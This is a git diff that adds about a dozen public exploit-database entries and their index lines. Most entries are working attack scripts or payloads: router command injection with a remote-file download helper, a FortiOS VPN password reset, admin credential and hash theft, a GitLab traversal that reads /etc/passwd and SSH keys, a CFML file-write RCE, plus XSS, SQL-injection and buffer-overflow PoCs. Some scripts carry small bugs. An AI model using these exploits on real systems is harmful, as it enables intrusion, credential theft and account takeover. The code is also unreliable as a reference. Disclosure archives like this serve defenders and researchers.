diff --git a/exploits/cgi/webapps/49079.py b/exploits/cgi/webapps/49079.py new file mode 100755 index 000000000..b05e5de7f --- /dev/null +++ b/exploits/cgi/webapps/49079.py @@ -0,0 +1,120 @@ +# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection +# Date: 13/09/2020 +# Exploit Author: Gabriele Zuddas +# Version: 01.01.02.127, 01.01.02.141 +# CVE : CVE-2020-24365 + + +Service Provider : Linkem +Product Name : LTE CPE +Model ID : WVRTM-127ACN +Serial ID : GMK170418011089 +IMEI : XXXXXXXXXXXXX +ICCID : XXXXXXXXXXXXXXXXXX +Firmware Version : 01.01.02.141 +Firmware Creation Date : May 15 13:04:30 CST 2019 +Bootrom Version : U-Boot 1.1.3 +Bootrom Creation Date : Oct 23 2015 - 16:03:05 +LTE Support Band : 42,43 + + +Injecting happens here: + +sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)& + + +Exploit has been tested on older verions too: + Firmware Version: 01.01.02.127 + Firmware Creation Date : May 23 15:34:10 CST 2018 + +""" + +import requests, time, argparse, re, sys + +class Exploit(): + + CVE = "CVE-2020-24365" + + def __init__(self, args): + self.args = args + self.session = requests.Session() + + def login(self): + s = self.session + r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password}) + if "sid" not in s.cookies: + print("[!] Login failed.") + exit(1) + sid = s.cookies["sid"] + s.headers = {"sid": sid} + print(f"[*] Login successful! (sid={sid})") + + def now(self): + return int(time.time() * 1000) + + def exploit(self, command): + self.login() + + with self.session as s: + payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}" + + r = s.get(payload) + r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1&time={self.now()}&_={self.now()}") + content = str(r.content, "utf8") + + #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface) + r = s.get(payload) + r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1&time={self.now()}&_={self.now()}") + content = str(r.content, "utf8") + + #TODO: eventually parse content with regex to clean out the output + c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content) + print(content) + print(c[0]) + + if len(c) > 0: + return c[0] + else: + return False + + def download_file(self, url): + filename = url.rsplit('/', 1)[-1] + + if self.args.file is not None: + print(f"[*] Attempting download of file '{filename}' from {url} ...") + + if self.exploit(f"wget {url} -O /tmp/{filename}"): + print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.") + print(self.exploit(f"du -h /tmp/{filename}")) + return True + else: + print(f"[!] Failed to download {filename} from {url}") + return False + + def run(self): + if self.args.command is not None: + print(self.exploit(self.args.command)) + exit() + if self.args.file is not None: + self.download_file(self.args.file) + exit() + +if __name__ == "__main__": + # Create the parser and add arguments + parser = argparse.ArgumentParser() + parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target") + parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use") + parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use") + parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute") + + parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory") + + args = parser.parse_args() + + # Run exploit + X = Exploit(args) + if len(sys.argv) > 1: + print(f"[*] Exploiting {X.CVE} ...") + X.run() + else: + parser.print_help(sys.stderr) \ No newline at end of file diff --git a/exploits/hardware/remote/49075.py b/exploits/hardware/remote/49075.py new file mode 100755 index 000000000..6fac1ca42 --- /dev/null +++ b/exploits/hardware/remote/49075.py @@ -0,0 +1,29 @@ +# Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure +# Date: 17th November 2020 +# Exploit Author: Nitesh Surana +# Vendor Homepage: https://www.gxgroup.eu/ont-products/ +# Version: P4410-V2-1.34H +# Tested on: Windows/Kali +# CVE : CVE-2020-25988 + +import upnpy + +upnp = upnpy.UPnP() + +# Discover UPnP devices on the network +# Returns a list of devices e.g.: [Device ] +devices = upnp.discover() + +# Select the device directly from the list +device = devices[0] + +# Get the services available for this device +# Returns a list of services available for the device +# device.get_services() + +# We can now access a specific service on the device by its ID like a dictionary +service = device['DeviceInfo1'] + +# Execute the action by its name (in our case, the 'X_GetAccess' action) +# Returns a dictionary containing the cleartext password of 'admin' user. +print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword'])) \ No newline at end of file diff --git a/exploits/hardware/webapps/49074.py b/exploits/hardware/webapps/49074.py new file mode 100755 index 000000000..effe189da --- /dev/null +++ b/exploits/hardware/webapps/49074.py @@ -0,0 +1,37 @@ +# Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification +# Google Dork: intitle:"Please Login" "Use FTM Push" +# Date: 15/11/2020 +# Exploit Author: Ricardo Longatto +# Details: This exploit allow change users password from SSLVPN web portal +# Vendor Homepage: https://www.fortinet.com/ +# Version: Exploit to Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10. +# Tested on: 6.0.4 +# NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382 +# CVE : CVE-2018-13382 +# Credits: Vulnerability by Meh Chang and Orange Tsai. + +#!/usr/bin/env python + +import requests, urllib3, sys, re, argparse +urllib3.disable_warnings() + +menu = argparse.ArgumentParser(description = "[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]") +menu.add_argument('-t', metavar='Target/Host IP', required=True) +menu.add_argument('-p', metavar='Port', required=True) +menu.add_argument('-u', metavar='User', required=True) +menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d', help='set the password for user, if you not set, the default password will be set to h4ck3d') +op = menu.parse_args() + +host = op.t +port = op.p +user = op.u +setpass = op.setpass + +url = "https://"+host+":"+port+"/remote/logincheck" +exploit = {'ajax':'1','username':user,'magic':'4tinet2095866','credential':setpass} +r = requests.post(url, verify=False, data = exploit) + +if re.search("/remote/hostcheck_install",r.text): + print "[+] - The new password to ["+user+"] is "+setpass+" <<<< [+]" +else: + print "Exploit Failed. :/" \ No newline at end of file diff --git a/exploits/multiple/webapps/49072.txt b/exploits/multiple/webapps/49072.txt new file mode 100644 index 000000000..89c99e066 --- /dev/null +++ b/exploits/multiple/webapps/49072.txt @@ -0,0 +1,17 @@ +# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS +# Date: 2020-11-18 +# Exploit Author: icekam +# Vendor Homepage: https://www.pescms.com/ +# Software Link: https://github.com/lazyphp/PESCMS-TEAM +# Version: PESCMS Team 2.3.2 +# CVE: CVE-2020-28092 + +PESCMS Team 2.3.2 has multiple reflected XSS via the id + +parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id= + + please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6 + +now I input payload : + +"> \ No newline at end of file diff --git a/exploits/multiple/webapps/49073.txt b/exploits/multiple/webapps/49073.txt new file mode 100644 index 000000000..565108687 --- /dev/null +++ b/exploits/multiple/webapps/49073.txt @@ -0,0 +1,17 @@ +# Exploit Title: xuucms 3 - 'keywords' SQL Injection +# Date: 2020-11-18 +# Exploit Author: icekam +# Vendor Homepage: https://www.cxuu.top/ +# Software Link: https://github.com/cbkhwx/cxuucmsv3 +# Version: cxuucms - v3 +# CVE : CVE-2020-28091 + +SQL injection exists in search.php. For details, please refer to: +https://github.com/cbkhwx/cxuucmsv3/issues/1 + +Use SQLMAP authentication: + sqlmap -u 'http://localhost/search.php?keywords=12345678' +--dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o +--batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 +Safari/537.36' -b --current-db --hostname \ No newline at end of file diff --git a/exploits/multiple/webapps/49077.txt b/exploits/multiple/webapps/49077.txt new file mode 100644 index 000000000..e97a40d6b --- /dev/null +++ b/exploits/multiple/webapps/49077.txt @@ -0,0 +1,79 @@ +# Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution +# Author: Darren King +# Date: 2020-07-23 +# Vendor Homepage: https://www.ortussolutions.com/products/testbox +# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 +# Version : 2.4.0 through to 4.1.0 +# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61 + +About TestBox +------------------------ +TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be +downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/). + +TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, +and allows users to run CFML unit tests and to generate reports. + +https://www.ortussolutions.com/products/testbox +https://github.com/Ortus-Solutions/testbox + +As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments. + +Command Injection & RCE +------------------------ +The file testbox/system/runners/HTMLRunner.cfm is vulnerable to command injection and can be exploited to obtain remote code execution on the remote host. +The block below shows the vulnerable code: + +HTMLRunner.cfm, lines 51-73: +// Write TEST.properties in report destination path. +if( url.propertiesSummary ){ + testResult = testbox.getResult(); + errors = testResult.getTotalFail() + testResult.getTotalError(); + savecontent variable="propertiesReport"{ + writeOutput( ( errors ? "test.failed=true" : "test.passed=true" ) & chr( 10 ) ); + writeOutput( "test.labels=#arrayToList( testResult.getLabels() )# + test.bundles=#URL.bundles# + test.directory=#url.directory# + total.bundles=#testResult.getTotalBundles()# + total.suites=#testResult.getTotalSuites()# + total.specs=#testResult.getTotalSpecs()# + total.pass=#testResult.getTotalPass()# + total.fail=#testResult.getTotalFail()# + total.error=#testResult.getTotalError()# + total.skipped=#testResult.getTotalSkipped()#" ); + } + + //ACF Compatibility - check for and expand to absolute path + if( !directoryExists( url.reportpath ) ) url.reportpath = expandPath( url.reportpath ); + + fileWrite( url.reportpath & "/" & url.propertiesFilename, propertiesReport ); +} + +If the "propertiesSummary" query string parameter is specified, the CFM page will write a properties file to the specified path with a summary of the tests performed. +The reportpath and propertiesFilename values are both supplied as query string parameters and are unvalidated, meaning that the user can supply an arbitrary filename and have the application output +a CFM file (i.e. propertiesFilename=evil.cfm) within the path of the application. +The user can also specify the "labels" to apply to the test (via the "labels" query string parameter), which are included in the written properties file. Again, these labels are unvalidated and +not sanitized, allowing arbitrary CFML tags and script to be passed to the code. When the properties are output to a CFM file (as per the propertiesFilename parameter), the written CFM +can then be accessed via the browser and any corresponding CFML tags will be executed by the CFML server. +(Note that Adobe ColdFusion often runs as the System user on Windows, which means it might be possible to achieve remote code execution as System in these circumstances.) + +Sample URL to write local CFM file: +http:///testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=
+ +Sample URL to confirm: +http:///testbox/system/runners/exec.cfm?cmd=whoami&args=/all + +Versions Affected +------------------------ +Versions affected (and platform tested on): + - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61) + - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) + - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) + - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) + - Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) + +Timeline +------------------------ +2020-07-23 - Reserved CVEs +2020-08-04 - Disclosed issues to vendor +2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production. \ No newline at end of file diff --git a/exploits/multiple/webapps/49078.txt b/exploits/multiple/webapps/49078.txt new file mode 100644 index 000000000..879369548 --- /dev/null +++ b/exploits/multiple/webapps/49078.txt @@ -0,0 +1,44 @@ +# Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal +# Author: Darren King +# Date: 2020-07-23 +# Vendor Homepage: https://www.ortussolutions.com/products/testbox +# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 +# Version : 2.3.0 through to 4.1.0 +# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61 + +About TestBox +------------------------ +TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be +downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/). + +TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, +and allows users to run CFML unit tests and to generate reports. + +https://www.ortussolutions.com/products/testbox +https://github.com/Ortus-Solutions/testbox + +As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments. + +Directory Traversal +------------------------ +The TestBox "test-browser" page does not adequately sanitise the "path" QueryString parameter, allowing an attacker +to perform a directory traversal on the page by specifying the value "path=/../" (appending '../' all the way up to the +system root). + +Sample URL: +http:///testbox/test-browser/index.cfm?path=/../ + +Versions Affected +------------------------ +Versions affected (and platform tested on): + - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61) + - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) + - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) + - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) + - Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) + +Timeline +------------------------ +2020-07-23 - Reserved CVEs +2020-08-04 - Disclosed issues to vendor +2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production. \ No newline at end of file diff --git a/exploits/multiple/webapps/49080.py b/exploits/multiple/webapps/49080.py new file mode 100755 index 000000000..3e41ae389 --- /dev/null +++ b/exploits/multiple/webapps/49080.py @@ -0,0 +1,52 @@ +# Title: M/Monit 3.7.4 - Privilege Escalation +# Author: Dolev Farhi +# Date: 2020-07-09 +# Vendor Homepage: https://mmonit.com/ +# Version : 3.7.4 + +import sys +import requests + +url = 'http://your_ip_here:8080' +username = 'test' +password = 'test123' + +sess = requests.Session() +sess.get(host) + +def login(): + print('Attempting to login...') + data = { + 'z_username':username, + 'z_password':password + } + headers = { + 'Content-Type':'application/x-www-form-urlencoded' + } + + resp = sess.post(url + '/z_security_check', data=data, headers=headers) + if resp.ok: + print('Logged in successfully.') + else: + print('Could not login.') + sys.exit(1) + +def privesc(): + data = { + 'uname':username, + 'fullname':username, + 'password':password, + 'admin':1 + } + resp = sess.post(url + '/api/1/admin/users/update', data=data) + + if resp.ok: + print('Escalated to administrator.') + else: + print('Unable to escalate to administrator.') + + return + +if __name__ == '__main__': + login() + privesc() \ No newline at end of file diff --git a/exploits/multiple/webapps/49081.py b/exploits/multiple/webapps/49081.py new file mode 100755 index 000000000..88d832b50 --- /dev/null +++ b/exploits/multiple/webapps/49081.py @@ -0,0 +1,45 @@ +# Title: M/Monit 3.7.4 - Password Disclosure +# Author: Dolev Farhi +# Date: 2020-07-09 +# Vendor Homepage: https://mmonit.com/ +# Version : 3.7.4 + +import sys +import requests + +url = 'http://your_ip_here:8080' +username = 'test' +password = 'test123' + +sess = requests.Session() +sess.get(host) + +def login(): + print('Attempting to login...') + data = { + 'z_username':username, + 'z_password':password + } + headers = { + 'Content-Type':'application/x-www-form-urlencoded' + } + + resp = sess.post(url + '/z_security_check', data=data, headers=headers) + if resp.ok: + print('Logged in successfully.') + else: + print('Could not login.') + sys.exit(1) + +def steal_hashes(): + resp = sess.get(url + '/api/1/admin/users/list') + if resp.ok: + for i in resp.json(): + mmonit_user = i['uname'] + result = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user)) + mmonit_passw = result.json()['password'] + print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw)) + +if __name__ == '__main__': + login() + steal_hashes() \ No newline at end of file diff --git a/exploits/multiple/webapps/49082.txt b/exploits/multiple/webapps/49082.txt new file mode 100644 index 000000000..e6c74054c --- /dev/null +++ b/exploits/multiple/webapps/49082.txt @@ -0,0 +1,41 @@ +# Exploit Title: Nagios Log Server 2.1.7 - 'snapshot_name' Persistent Cross-Site Scripting +# Date: 31.08.2020 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://www.nagios.com/ +# Software Link: https://www.nagios.com/products/nagios-log-server/ +# Version: 2.1.7 +# Tested on: Linux/ISO + +# Link: +https://github.com/EmreOvunc/Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting + +# Description + +A stored cross-site scripting (XSS) in Nagios Log Server 2.1.7 can result +in an attacker performing malicious actions to users who open a maliciously +crafted link or third-party web page. + +# PoC + +To exploit vulnerability, someone could use a POST request to +'/nagioslogserver/configure/create_snapshot' by manipulating +'snapshot_name' parameter in the request body to impact users who open a +maliciously crafted link or third-party web page. + +POST /nagioslogserver/configure/create_snapshot HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) +Gecko/20100101 Firefox/79.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 117 +DNT: 1 +Connection: close +Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; +ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; +PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53 +Upgrade-Insecure-Requests: 1 + +csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=[XSS_PAYLOAD] \ No newline at end of file diff --git a/exploits/ruby/webapps/49076.py b/exploits/ruby/webapps/49076.py new file mode 100755 index 000000000..7e21d22f6 --- /dev/null +++ b/exploits/ruby/webapps/49076.py @@ -0,0 +1,68 @@ +# Exploit Title: Gitlab 12.9.0 - Arbitrary File Read (Authenticated) +# Google Dork: - +# Date: 11/15/2020 +# Exploit Author: Jasper Rasenberg +# Vendor Homepage: https://about.gitlab.com +# Software Link: https://about.gitlab.com/install +# Version: tested on gitlab version 12.9.0 +# Tested on: Kali Linux 2020.3 + + + +#You can create as many personal access tokens as you like from your GitLab profile. +# Sign in to GitLab. +# In the upper-right corner, click your avatar and select Settings. +# On the User Settings menu, select Access Tokens. +# Choose a name and optional expiry date for the token. +# Choose the desired scopes. +# Click the Create personal access token button. +# Save the personal access token somewhere safe. If you navigate away or refresh your page, and you did not save the token, you must create a new one. + +# REFERENCE: https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html + +# pip3 install gitlab +# pip3 install requests +# Use a client cert to verify SSL or set to False + +import os +import requests +import json +from time import sleep +from gitlab import * + +session = requests.Session() +session.verify = f'{os.getcwd()}/' # or set session.verify = False + +host = '' + +def exploit(projectName, issueTitle, files, token): + +    gl = Gitlab(host, private_token=token, session=session) +    gl.auth() +    p1 = gl.projects.create({'name': f"{projectName}-1"}) +    p2 = gl.projects.create({'name': f"{projectName}-2"}) + +    for i, f in enumerate(files): +        stripped_f = f.rstrip('\n') +        issue = p1.issues.create({ \ +                'title': f"{issueTitle}-{i}", +                'description': \ +                "![a](/uploads/11111111111111111111111111111111/"\ +                f"../../../../../../../../../../../../../..{stripped_f})"}) +        print(issue.description) +        sleep(3) +        try: +            issue.move(p2.id) +        except Exception as e: +            pass +        sleep(3) + +if __name__ == "__main__": + + write_files = ['/etc/passwd', '~/.ssh/id_rsa'] + with open('senstive_files', 'w') as sens: + for file in write_files: + sens.write(file) + +    files = list(open('sensitive_files', 'r')) +    exploit('project-1', 'issue-1', files) \ No newline at end of file diff --git a/exploits/windows/dos/49083.pl b/exploits/windows/dos/49083.pl new file mode 100755 index 000000000..2b6ba342b --- /dev/null +++ b/exploits/windows/dos/49083.pl @@ -0,0 +1,31 @@ +# Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC) +# Date: November 18, 2020 +# Exploit Author: Vincent Wolterman +# Vendor Homepage: http://www.internetdownloadmanager.com/ +# Software Link: http://www.internetdownloadmanager.com/download.html +# Version: 6.38.12 +# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Home Build 19041 + +# Steps to reproduce crash: +# 1) Execute provided Perl code +# 2) Open IDMan_Crash.txt output file +# 3) Copy contents of text file to clipboard +# 4) Open Internet Download Manager 6.38 +# 5) From the Menu bar -> Downloads -> Scheduler +# 6) Check the box for 'Open the following file when done:' +# 7) Paste the contents of IDMan_Crash.txt into the input field below +# 8) Click 'Apply' and observe the crash + +#!/usr/bin/perl + +$baddata = "\x41" x 1302; +$baddata .= "\x42" x 2; # this length overwrites NSEH on Windows 7 Pro SP 1 +$baddata .= "\x43"x(5000-length($baddata)); + +$file = "IDMan_Crash.txt"; +open (FILE, '>IDMan_Crash.txt'); +print FILE $baddata; +close (FILE); + +print "Exploit file created [" . $file . "]\n"; +print "Buffer size: " . length($baddata) . "\n"; \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index acdc509c0..3bfa02a0d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6760,6 +6760,7 @@ id,file,description,date,author,type,platform,port 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows, 48731,exploits/windows/dos/48731.py,"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)",2020-08-05,MegaMagnus,dos,windows, 48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows, +49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -18299,6 +18300,7 @@ id,file,description,date,author,type,platform,port 49067,exploits/multiple/remote/49067.py,"Aerospike Database 5.1.0.3 - OS Command Execution",2020-11-17,"Matt S",remote,multiple, 49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple, 49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows, +49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -38115,8 +38117,8 @@ id,file,description,date,author,type,platform,port 37767,exploits/multiple/webapps/37767.txt,"Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",webapps,multiple, 37769,exploits/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",webapps,php, 37770,exploits/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor / Remote Code Execution",2015-08-15,MadMouse,webapps,hardware, -37773,exploits/php/webapps/37773.txt,"Joomla! Component com_memorix - SQL Injection",2015-08-15,"BM Cloudx",webapps,php, -37774,exploits/php/webapps/37774.txt,"Joomla! Component com_informations - SQL Injection",2015-08-15,"BM Cloudx",webapps,php, +37773,exploits/php/webapps/37773.txt,"Joomla! Component com_memorix - SQL Injection",2015-08-15,Omar,webapps,php, +37774,exploits/php/webapps/37774.txt,"Joomla! Component com_informations - SQL Injection",2015-08-15,Omar,webapps,php, 37778,exploits/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",webapps,hardware, 37779,exploits/php/webapps/37779.txt,"Flogr - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",webapps,php, 37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php, @@ -43299,3 +43301,13 @@ id,file,description,date,author,type,platform,port 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php, 49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php, 49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple, +49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple, +49074,exploits/hardware/webapps/49074.py,"Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification",2020-11-19,"Ricardo Longatto",webapps,hardware, +49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple, +49076,exploits/ruby/webapps/49076.py,"Gitlab 12.9.0 - Arbitrary File Read (Authenticated)",2020-11-19,"Jasper Rasenberg",webapps,ruby, +49077,exploits/multiple/webapps/49077.txt,"TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution",2020-11-19,"Darren King",webapps,multiple, +49078,exploits/multiple/webapps/49078.txt,"TestBox CFML Test Framework 4.1.0 - Directory Traversal",2020-11-19,"Darren King",webapps,multiple, +49079,exploits/cgi/webapps/49079.py,"Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection",2020-11-19,"Gabriele Zuddas",webapps,cgi, +49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple, +49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple, +49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,